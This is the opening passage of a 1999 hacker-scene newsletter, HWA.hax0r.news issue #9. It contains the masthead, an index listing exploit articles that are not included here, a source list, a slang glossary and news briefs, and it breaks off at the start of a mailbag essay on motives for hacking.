[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                     <=-[ HWA.hax0r.news ]-=>                           =
==========================================================================
  [=HWA'99=]                         Number 9 Volume 1 1999 March 13th 99
==========================================================================

  Are you running WindowsNT and still under the illusion that it is secure?

  ``A couple of freelance writers are working on a story for us about
  security auditing and protection. As part of their "research," they
  decided to see if they could hack into one of our lab networks. It took
  them only a few hours to successfully break into our Windows NT boxes.
  And from there, they learned the configuration of our lab networks, the
  server names and functions, the operating systems we run and most of the
  passwords on the key accounts on our Microsoft Windows NT, Novell NetWare
  and Unix servers, as well as a good many of our routers and switches.''

                        - From NetworkWeek, Story in section 10.0

  Synopsis
  --------

  The purpose of this newsletter is to 'digest' current events of interest
  that affect the online underground and netizens in general. This includes
  coverage of general security issues, hacks, exploits, underground news
  and anything else I think is worthy of a look see.

  This list is NOT meant as a replacement for, nor to compete with, the
  likes of publications such as CuD or PHRACK or with news sites such as
  AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  BUGTRAQ or ISN nor could any other 'digest' of this type do so.
  It *is* intended however, to complement such material and provide a
  reference to those who follow the culture by keeping tabs on as many
  sources as possible and providing links to further info, it's a labour
  of love and will be continued for as long as I feel like it, i'm not
  motivated by dollars or the illusion of fame, did you ever notice how the
  most famous/infamous hackers are the ones that get caught? there's a lot
  to be said for remaining just outside the circle...

  @HWA

 =-----------------------------------------------------------------------=

                  Welcome to HWA.hax0r.news ... #9

 =-----------------------------------------------------------------------=

    "I'm doing the BEST I can so don't give me any SHIT"

                        - Seen on a button worn by `Ed'..

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    *******************************************************************

 =-------------------------------------------------------------------------=

  Issue #9                                    Empirical knowledge is power

 =--------------------------------------------------------------------------=

  inet.d THIS b1lly the llammah

  ________ ------- ___________________________________________________________
 |\____\_/[ INDEX ]__________________________________________________________/|
 | |                                                                         ||
 | | Key     Content                                                         ||
  \|_________________________________________________________________________/

    00.0  .. COPYRIGHTS
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
    00.2  .. SOURCES
    00.3  .. THIS IS WHO WE ARE
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
    00.5  .. THE HWA_FAQ V1.0

  \__________________________________________________________________________/

    01.0  .. Greets
    01.1  .. Last minute stuff, rumours, newsbytes
    01.2  .. Mailbag
    02.0  .. From the editor
    02.1  .. Demoniz trashcans his webboard
    03.0  .. AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse
    03.1  .. The FPSC-IRCD.txt advisory.
    04.0  .. Pentagon under attack (again)
    04.1  .. Passwords visible in plaintext in Cheyenne's Anti-Virus Agent
             for Exchange.
    04.2  .. New Backdoor found: Default passwords in Bay networks switches
    04.3  .. ISAPI exploit code
    04.4  .. Winfreez.c new exploit code for win9x and NT
    04.5  .. Unknown Zone: Windows intra/inter net zone difficulties
    04.6  .. Sniffing out MS Security glitch
    05.0  .. Linux TCP flaw exploit code for Linux 2.0.35 and older.
             (includes Solaris version)
    06.0  .. Solaris 2.6 x86 /usr/bin/write buffer overflow exploit
    07.0  .. New Computer Technology Makes Hacking a Snap - Washington Post
    08.0  .. Korean "Superhacker" a national resource...
    09.0  .. The l0pht and NFR team up to produce top flight IDS
    10.0  .. A good example of how 'Secure' NT really is
    11.0  .. CON: The Black Hat Briefings Security Conference
    12.0  .. CON: CQRE [Secure] Congress and Exhibition
    13.0  .. CON: can't afford $2k? check out Canc0n99 security Conference
    14.0  .. CON: Countering cyberterrorism

    AD.S  .. Post your site ads or etc here, if you can offer something in
             return thats tres cool, if not we'll consider ur ad anyways so
             send it in.

    H.W   .. Hacked Websites
    A.0   .. APPENDICES
    A.1   .. PHACVW linx and references

  ____________________________________________________________________________
 |\__________________________________________________________________________/|
 | |                                                                         ||
 | |                                                                         ||
  \|_________________________________________________________________________|/

  @HWA'99

  00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
  PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
  FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
  SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
  Important semi-legalese and license to redistribute:

  YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
  THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
  AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT
  NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
  http://welcome.to/HWA.hax0r.news

  IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
  NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
  current email cruciphux@dok.org

  THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
  (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
  COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I
  GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR.

  - EoD

  Although this file and all future issues are now copyright, some of the
  content holds its own copyright and these are printed and respected. News
  is news so i'll print any and all news but will quote sources when the
  source is known, if its good enough for CNN its good enough for me. And
  i'm doing it for free on my own time so pfffft. :)

  No monies are made or sought through the distribution of this material.
  If you have a problem or concern email me and we'll discuss it.

  cruciphux@dok.org

  Cruciphux [C*:.]

  00.1 CONTACT INFORMATION AND MAIL DROP
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Has it occurred to anybody that "AOL for Dummies" is an extremely
  redundant name for a book?
                                  - unknown

  Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
  North America (hell even if you are inside ..) and wish to send printed
  matter like newspaper clippings a subscription to your cool foreign hacking
  zine or photos, small non-explosive packages or sensitive information etc
  etc well, now you can. (w00t) please no more inflatable sheep or plastic
  dog droppings, or fake vomit thanks.

  Send all goodies to:

      HWA NEWS
      P.O BOX 44118
      370 MAIN ST.
      NORTH BRAMPTON, ONTARIO
      CANADA
      L6V 4H5

  WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
  ~~~~~~~  reading this from some interesting places, make my day and get a
           mention in the zine, send in a postcard, I realize that some places
           it is cost prohibitive but if you have the time and money be a cool
           dude / gal and send a poor guy a postcard preferably one that has
           some scenery from your place of residence for my collection, I
           collect stamps too so you kill two birds with one stone by being
           cool and mailing in a postcard, return address not necessary, just
           a "hey guys being cool in Bahrain, take it easy" will do ... ;-)
           thanx.

  Ideas for interesting 'stuff' to send in apart from news:

  - Photo copies of old system manual front pages (optionally signed by
    you) ;-)
  - Photos of yourself, your mom, sister, dog and or cat in a NON
    compromising position plz I don't want pr0n.
  - Picture postcards
  - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
    with hack/security related archives, logs, irc logs etc on em.
  - audio or video cassettes of yourself/others etc of interesting phone fun
    or social engineering examples or transcripts thereof.

  If you still can't think of anything you're probably not that interesting
  a person after all so don't worry about it

  Our current email:

  Submissions/zine gossip.....: hwa@press.usmc.net
  Private email to editor.....: cruciphux@dok.org
  Distribution/Website........: sas72@usa.net

  @HWA

  00.2 Sources ***
       ~~~~~~~~~~~

  Sources can be some, all, or none of the following (by no means complete
  nor listed in any degree of importance) Unless otherwise noted, like msgs
  from lists or news from other sites, articles and information is compiled
  and or sourced by Cruciphux no copyright claimed.

  HiR:Hackers Information Report... http://axon.jccc.net/hir/
  News & I/O zine ................. http://www.antionline.com/
 *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!*
  News (New site unconfirmed).......http://cnewz98.hypermart.net/
  Back Orifice/cDc..................http://www.cultdeadcow.com/
  News site (HNN) .....,............http://www.hackernews.com/
  Help Net Security.................http://net-security.org/
  News,Advisories,++ ...............http://www.l0pht.com/
  NewsTrolls (HNN)..................http://www.newstrolls.com/
  News + Exploit archive ...........http://www.rootshell.com/beta/news.html
  CuD ..............................http://www.soci.niu.edu/~cudigest
  News site+........................http://www.zdnet.com/

  +Various mailing lists and some newsgroups, such as ...
  +other sites available on the HNN affiliates page, please see
   http://www.hackernews.com/affiliates.html as they seem to be popping up
   rather frequently ...

  * Yes demoniz is now officially retired, if you go to that site though the
    Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org
    will also be hosting a webboard as soon as that site comes online perhaps
    you can visit it and check us out if I can get some decent wwwboard code
    running I don't really want to write my own, another alternative being
    considered is a telnet bbs that will be semi-open to all, you will be
    kept posted. - cruciphux

  http://www.the-project.org/ .. IRC list/admin archives
  http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

  alt.hackers.malicious
  alt.hackers
  alt.2600
  BUGTRAQ
  ISN security mailing list
  ntbugtraq
  <+others>

  NEWS Agencies, News search engines etc:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  http://www.cnn.com/SEARCH/
  http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
  http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
  http://www.ottawacitizen.com/business/
  http://search.yahoo.com.sg/search/news_sg?p=cracker
  http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
  http://www.zdnet.com/zdtv/cybercrime/
  http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

  NOTE: See appendices for details on other links.

  http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
  http://freespeech.org/eua/ Electronic Underground Affiliation
  http://www.l0pht.com/cyberul.html
  http://www.hackernews.com/archive.html?122998.html
  http://ech0.cjb.net ech0 Security
  http://net-security.org Net Security
  ...

  Submissions/Hints/Tips/Etc
  ~~~~~~~~~~~~~~~~~~~~~~~~~~

  All submissions that are `published' are printed with the credits you
  provide, if no response is received by a week or two it is assumed that
  you don't care whether the article/email is to be used in an issue or not
  and may be used at my discretion.

  Looking for:

  Good news sites that are not already listed here OR on the HNN affiliates
  page at http://www.hackernews.com/affiliates.html

  Magazines (complete or just the articles) of breaking sekurity or hacker
  activity in your region, this includes telephone phraud and any other
  technological use, abuse hole or cool thingy. ;-) cut em out and send it
  to the drop box.
  - Ed

  Mailing List Subscription Info   (Far from complete)         Feb 1999
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

  ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

  THE MOST READ:

  BUGTRAQ - Subscription info
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~

  What is Bugtraq?

  Bugtraq is a full-disclosure UNIX security mailing list, (see the info
  file) started by Scott Chasin. To subscribe to bugtraq, send mail to
  listserv@netspace.org containing the message body subscribe bugtraq. I've
  been archiving this list on the web since late 1993. It is searchable with
  glimpse and archived on-the-fly with hypermail.

  Searchable Hypermail Index;

      http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

  About the Bugtraq mailing list
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  The following comes from Bugtraq's info file:

  This list is for *detailed* discussion of UNIX security holes: what they
  are, how to exploit, and what to do to fix them.

  This list is not intended to be about cracking systems or exploiting their
  vulnerabilities. It is about defining, recognizing, and preventing use of
  security holes and risks.

  Please refrain from posting one-line messages or messages that do not
  contain any substance that can relate to this list's charter.

  I will allow certain informational posts regarding updates to security
  tools, documents, etc. But I will not tolerate any unnecessary or
  nonessential "noise" on this list.
  Please follow the below guidelines on what kind of information should be
  posted to the Bugtraq list:

  + Information on Unix related security holes/backdoors (past and present)
  + Exploit programs, scripts or detailed processes about the above
  + Patches, workarounds, fixes
  + Announcements, advisories or warnings
  + Ideas, future plans or current works dealing with Unix security
  + Information material regarding vendor contacts and procedures
  + Individual experiences in dealing with above vendors or security
    organizations
  + Incident advisories or informational reporting

  Any non-essential replies should not be directed to the list but to the
  originator of the message. Please do not "CC" the bugtraq reflector
  address if the response does not meet the above criteria.

  Remember: YOYOW.

  You own your own words. This means that you are responsible for the words
  that you post on this list and that reproduction of those words without
  your permission in any medium outside the distribution of this list may be
  challenged by you, the author.

  For questions or comments, please mail me:
  chasin@crimelab.com (Scott Chasin)

  BEST-OF-SECURITY Subscription Info.
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                    _/_/_/          _/_/          _/_/_/
                   _/    _/      _/    _/      _/
                  _/_/_/        _/    _/        _/_/
                 _/    _/      _/    _/            _/
                _/_/_/          _/_/        _/_/_/

                Best            Of          Security

  "echo subscribe|mail best-of-security-request@suburbia.net"

                          or

  "echo subscribe|mail best-of-security-request-d@suburbia.net"

                                                  (weekly digest)

  For those of you that just don't get the above, try sending a message to
  best-of-security-request@suburbia.net with a subject and body of subscribe
  and you will get added to the list (maybe, if the admin likes your email).

  Crypto-Gram
  ~~~~~~~~~~~

  CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
  insights, and commentaries on cryptography and computer security.

  To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
  blank message to crypto-gram-subscribe@chaparraltree.com.
  To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back
  issues are available on http://www.counterpane.com.

  CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
  Counterpane Systems, the author of "Applied Cryptography," and an inventor
  of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
  the International Association for Cryptologic Research, EPIC, and VTW. He
  is a frequent writer and lecturer on cryptography.

  CUD Computer Underground Digest
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  This info directly from their latest ish:

  Computer underground Digest    Sun 14 Feb, 1999    Volume 11 : Issue 09
                                                     ISSN 1004-042X

      Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
      News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
      Archivist: Brendan Kehoe
      Poof Reader: Etaion Shrdlu, Jr.
      Shadow-Archivists: Dan Carosone / Paul Southworth
                         Ralph Sims / Jyrki Kuoppala
                         Ian Dickinson
      Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

  [ISN] Security list
  ~~~~~~~~~~~~~~~~~~~

  This is a low volume list with lots of informative articles, if I had my
  way i'd reproduce them ALL here, well almost all .... ;-) - Ed

  Subscribe: mail majordomo@repsec.com with "subscribe isn".

  @HWA

  00.3 THIS IS WHO WE ARE
       ~~~~~~~~~~~~~~~~~~

  "If all it takes is a million monkeys banging on keyboards then how come
  AOL hasn't turned out any Shakespeare yet??" - Anon.

  Some HWA members and Legacy staff
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  cruciphux@dok.org.........: currently active/editorial
  darkshadez@ThePentagon.com: currently active/man in black
  fprophet@dok.org..........: currently active/IRC+ man in black
  sas72@usa.net ............. currently active/IRC+ distribution
  vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  dicentra...(email withheld): IRC+ grrl in black

  Foreign Correspondents/affiliate members
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  ATTENTION: All foreign correspondents please check in or be removed by
  next issue I need your current emails since contact info was recently lost
  in a HD mishap and i'm not carrying any deadweight. Plus we need more
  people sending in info, my apologies for not getting back to you if you
  sent in January I lost it, please resend.

  N0Portz ..........................: Australia
  Qubik ............................: United Kingdom
  system error .....................: Indonesia
  Wile (wile coyote) ...............: Japan/the East
  Ruffneck  ........................: Netherlands/Holland

  And unofficially yet contributing too much to ignore ;)

  Spikeman .........................: World media

  Please send in your sites for inclusion here if you haven't already also
  if you want your emails listed send me a note ... - Ed

  http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site

  Contributors to this issue:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Spikeman .........................: daily news updates+

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    *******************************************************************

  :-p

  1. We do NOT work for the government in any shape or form. Unless you
     count paying taxes ... in which case we work for the gov't in a BIG
     WAY. :-/

  2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
     news events its a good idea to check out issue #1 at least and possibly
     also the Xmas issue for a good feel of what we're all about otherwise
     enjoy - Ed ...

  @HWA

  00.4 Whats in a name? why HWA.hax0r.news??
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  "When i'm 21 i'm going to change my name to 'Anonymous' and claim
  royalties for all the editorials written and attributed to my name."
                                                        - Anonymous

  Well what does HWA stand for? never mind if you ever find out I may have
  to get those hax0rs from 'Hackers' or the Pretorians after you.

  In case you couldn't figure it out hax0r is "new skewl" and although it is
  laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?)
  dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS
  anymore. BTW to all you up and comers, i'd highly recommend you get that
  book. Its almost like buying a clue. Anyway..on with the show ..

  - Editorial staff

  @HWA

  00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Also released in issue #3. (revised) check that issue for the faq it won't
  be reprinted unless changed in a big way with the exception of the
  following excerpt from the FAQ, included to assist first time readers:

  Some of the stuff related to personal usage and use in this zine are
  listed below: Some are very useful, others attempt to deny any possible
  attempts at eschewing obfuscation by obscuring their actual definitions.

  @HWA   - see EoA ;-)

  !=     - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If written
           an =/= (equals sign with a slash thru it) also means !=, =< is
           Equal to or less than and => is equal to or greater than (etc,
           this aint fucking grade school, cripes, don't believe I just
           typed all that..)

  AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or
           <21)

  AOL    - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses through,
           we're not talking Kung-Fu being none too good here, Buy-A-Kloo
           maybe at the least they could try leasing one??
 *CC     - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

  CCC    - Chaos Computer Club (Germany)

 *CON    - Conference, a place hackers crackers and hax0rs among others go
           to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
           gear, get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.

 *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
                hacker speak he's the guy that breaks into systems and is
                often (but by no means always) a "script kiddie" see pheer
            2 . An edible biscuit usually crappy tasting without a nice dip,
                I like jalapeno pepper dip or chives sour cream and onion,
                yum - Ed

  Ebonics - speaking like a rastafarian or hip dude of colour also wigger
            Vanilla Ice is a wigger, The Beastie Boys and rappers speak
            using ebonics, speaking in a dark tongue ... being ereet, see
            pheer

  EoC    - End of Commentary

  EoA    - End of Article or more commonly @HWA

  EoF    - End of file

  EoD    - End of diatribe (AOL'ers: look it up)

  FUD    - Coined by Unknown and made famous by HNN - "Fear uncertainty and
           doubt", usually in general media articles not high brow articles
           such as ours or other HNN affiliates ;)

  du0d   - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.

 *HACKER - Read Stephen Levy's HACKERS for the true definition, then see
           HAX0R

 *HAX0R  - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
               difficult to define, I think it is best defined as pop
               culture's view on The Hacker ala movies such as well erhm
               "Hackers" and The Net etc... usually used by "real" hackers
               or crackers in a derogatory or slang humorous way, like
               'hax0r me some coffee?' or can you hax0r some bread on the
               way to the table please?'
           2 - A tool for cutting sheet metal.
  HHN    - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN .. and
           HNN as a proper noun means the hackernews site proper. k? k. ;&

  HNN    - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

  J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

  MFI/MOI- Missing on/from IRC

  NFC    - Depends on context: No Further Comment or No Fucking Comment

  NFR    - Network Flight Recorder (Do a websearch) see 0wn3d

  NFW    - No fuckin' way

 *0WN3D  - You are cracked and owned by an elite entity see pheer

 *OFCS   - Oh for christ's sakes

  PHACV  - And variations of same
           Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus,
           Warfare

           Alternates: H  - hacking, hacktivist
                       C  - Cracking
                       C  - Cracking
                       V  - Virus
                       W  - Warfare
                       CT - Cyber Terrorism

 *PHEER  - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

 *RTFM   - Read the fucking manual - not always applicable since some
           manuals are pure shit but if the answer you seek is indeed in the
           manual then you should have RTFM you dumb ass.

  TBC    - To Be Continued also 2bc (usually followed by ellipses...) :^0

  TBA    - To Be Arranged/To Be Announced also 2ba

  TFS    - Tough fucking shit.

 *w00t   - 1 - Reserved for the uber ereet, no one can say this without
               severe repercussions from the underground masses. also
               "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
               shit stirrers)

 *wtf    - what the fuck

 *ZEN    - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

  @HWA

                        -=- :. .: -=-

  01.0 Greets!?!?! yeah greets! w0w huh. - Ed
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Thanks to all in the community for their support and interest but i'd like
  to see more reader input, help me out here, whats good, what sucks etc,
  not that I guarantee i'll take any notice mind you, but send in your
  thoughts anyway.
  Shouts to:

  * Kevin Mitnick      * demoniz       * The l0pht crew
  * tattooman          * Dicentra      * Pyra
  * Vexxation          * FProphet      * TwistedP
  * NeMstah            * the readers   * mj
  * Kokey              * ypwitch       * kimmie
  * tsal               * spikeman      * YOU.
  * #leetchans ppl, you know who you are...
  * all the people who sent in cool emails and support
  * our new 'staff' members.

  kewl sites:

  + http://www.freshmeat.net/
  + http://www.slashdot.org/
  + http://www.l0pht.com/
  + http://www.2600.com/
  + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/)
  + http://www.legions.org/
  + http://www.genocide2600.com/
  + http://www.genocide2600.com/~spikeman/
  + http://www.genocide2600.com/~tattooman/
  + http://www.hackernews.com/ (Went online same time we started issue 1!)

  @HWA

  01.1 Last minute stuff, rumours and newsbytes
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  "What is popular isn't always right, and what is right isn't always
  popular..."
                        - FProphet '99

  +++ When was the last time you backed up your important data?

  ++ BORED?
     You may be interested in this...
     http://www.patents.ibm.com/details?patent_number=5501650
     if that isn't quite your erh speed, then you can always check out
     http://www.hamsterdance.com/ for a laugh I enjoyed it ...the graphics
     are most amusing.

  ++ SO YOU SAY YOUR MACHINE CRASHES EVERY MONTH OR SO?
     Contributed by FProphet
     source: Betanews.com

     And you thought it was just you. Betanews.com (www.betanews.com)
     reports that Microsoft has acknowledged a new bug discovered in Windows
     that locks a machine after 49.7 days of consecutive usage. A fix is
     available now, and is expected to appear in the forthcoming Windows 98
     service release update, currently expected to be released in April.
     Microsoft's Personal Support Center has details.
  ++ INTEL PENTIUM III CHIP SERIAL NUMBERS CAN BE RETRIEVED BY ANYONE
     Mar 11th
     Contributed by Ed

     Intel released a program that allows the user to turn off the serial
     number of their new Pentium III chip, but Zero-Knowledge Systems claims
     it has developed an exploit which will retrieve the serial number
     whether the feature is turned on or off. I don't have one of these
     chips to test this out on so can't confirm or deny this report.

  ++ BANK PLAN FOES LINE UP
     http://www.wired.com/news/news/email/explode-infobeat/politics/story/18271.html
     Opponents of "Know Your Customer," a controversial plan by the
     government to monitor individuals' banking activities, will make their
     case on Capitol Hill. By Declan McCullagh.

  ++ DELL TO BUY BOATLOAD FROM IBM
     http://www.wired.com/news/news/email/explode-infobeat/business/story/18266.html
     Dell will buy about US$16 billion of chips, drives, and monitors from
     IBM during the next seven years. It's a nice boost to both companies.

  ++ CANADIAN TELECOM BEHEMOTH BORN
     http://www.wired.com/news/news/email/explode-infobeat/business/story/18269.html
     AT&T Canada buys regional phone firm Metronet communications in US$4.6
     billion deal.

  ++ EUROPEAN TELECOMS: BUY, BUY, BUY
     http://www.wired.com/news/news/email/explode-infobeat/business/story/18268.html
     France's Alcatel agrees to buy another California Internet company for
     US$350 million. And Germany's Siemens is expected to spend $US1.7
     billion on US data-networking firms.

  ++ IT'S A LINUXWORLD AFTER ALL
     http://www.wired.com/news/news/email/explode-infobeat/technology/story/18261.html
     This week's conference is turning a tightknit community into an
     international phenomenon. Not all of the new industry stars are ready
     for the spotlight. Polly Sprenger reports from San Jose, California.

  ++ LINUX GETS OPEN-SOURCE GUI
     http://www.wired.com/news/news/email/explode-infobeat/technology/story/18265.html
     Thanks to an interface lift, Linux is ready to star on the desktop.
     GNOME marries components from familiar windowing environments and adds
     a few things of its own. Leander Kahney reports from San Jose,
     California.

  ++ NIPPING AT THE HEELS OF MP3
     http://www.wired.com/news/news/email/explode-infobeat/technology/story/18253.html
     When high tech does battle on the Net, it's not always the best tech
     that wins. This is the lesson that a smaller, faster digital music
     format is learning in the face of MP3. By Christopher Jones.

  ++ TURNING DATA INTO DOLLARS
     http://www.wired.com/news/news/email/explode-infobeat/business/story/18254.html
     PeopleSoft stores information on about 30 million employees worldwide.
     Now the company is looking to generate e-business from its data banks,
     a plan that's raising eyebrows. By Joanna Glasner.

  ++ FROM COMDEX TO VENICE
     http://www.wired.com/news/news/email/explode-infobeat/culture/story/18258.html
     The creator of one of the world's biggest computer-trade shows builds
     the world's most high-tech hotel. Vince Beiser reports from Las Vegas.

  ++ NO TIME FOR PAIN
     http://www.wired.com/news/news/email/explode-infobeat/technology/story/18255.html
     A new therapy using electric current reduces chronic back pain,
     according to a study in the Journal of the American Medical
     Association. By Kristen Philipkoski.

  ++ MONICA'S BIO, BYTE BY BYTE
     http://www.wired.com/news/news/email/explode-infobeat/culture/story/18257.html
     Monica's Story, the Lewinsky memoir hitting bookstores on Thursday,
     will be the first book published simultaneously in e-book and paper
     form. By Steve Silberman.

  ++ BIG INSIDER SALES AT YAHOO
     http://www.wired.com/news/news/email/explode-infobeat/business/story/18251.html
     Executives sold close to a million shares in February. Analysts say
     this could be a red flag. By Jennifer Sullivan.
  ++ SENATE HEARS Y2K LIABILITY ACT
     http://www.wired.com/news/news/email/explode-infobeat/politics/story/18259.html
     Two senators introduce the latest legislation to head off a raft of
     Year 2000 lawsuits arising from failed computer systems. By Heidi Kriz.

  ++ BRITS ON NET: JOLLY GOOD
     http://www.wired.com/news/news/email/explode-infobeat/technology/story/18260.html
     Ten thousand new Britons log on each day, a new poll reveals. German
     newbies nip close at their heels, but France has a ways to go.

  ++ KING FOR THE DOMAINS IN SIGHT
     http://www.wired.com/news/news/email/explode-infobeat/politics/story/18245.html
     The Internet Corporation for Assigned Names and Numbers finalizes
     proposals that will lay down the law on .com -- as well as .biz, .xxx,
     and other future top-level domains. By Chris Oakes.

  ++ GREENSPAN: BE WARY OF NET STOCKS (BUS. Wednesday)
     http://www.wired.com/news/news/email/explode-infobeat/business/story/18250.html
     Older investors looking to retire should stay away from Internet
     stocks, the Federal Reserve chairman tells Congress.

  ++ CLINTON TABS PRIVACY POINT MAN (POL. Wednesday)
     http://www.wired.com/news/news/email/explode-infobeat/politics/story/18249.html
     An Ohio State law professor will represent the administration's views
     concerning online privacy, an issue which gains a little more momentum
     every day. By Declan McCullagh and James Glave.

  ++ MUSIC INDUSTRY PLANS DVD AUDIO
     http://www.wired.com/news/news/email/explode-infobeat/technology/story/18247.html
     Record companies and technology companies agree on a copy-protection
     framework for the successor to CDs. DVD Audio is finally ready for
     consumers. By Christopher Jones.

  ++ DELL MORPHS INTO A RETAILER
     http://www.wired.com/news/news/email/explode-infobeat/business/story/18242.html
     The world's biggest direct seller of PCs hopes to become a big online
     seller of consumer electronics too. Wednesday, it launched its own
     online superstore.
++ LINUX, MEET OPERA
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18241.html
Fans of Linux and Opera, which have both built support by taking on the bigwigs, can now run the underdog browser on the underdog OS.

Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG
     ~~~~~~~

Lots of mail, not much for sharing here though ... keep the letters coming! but don't forget to include something I can print too... ;)

. . . . . . .

// Written by NUL (If you don't know, don't ask)
// http://come.to/hexx (UnderConstruction)
// jeanclaude@canada.com
// 99/03/11

#include

To start this off I would like to make one thing abundantly clear: I do not consider myself a hacker. I'm more interested in programming than anything else. Sure, I've toiled a bit, but I cannot be considered as one of the El33t. The reason for which I am writing this little article is to try to place a bit of clarity on the reasons for hacking / cracking (or at least trying to make sense of them).

/* */

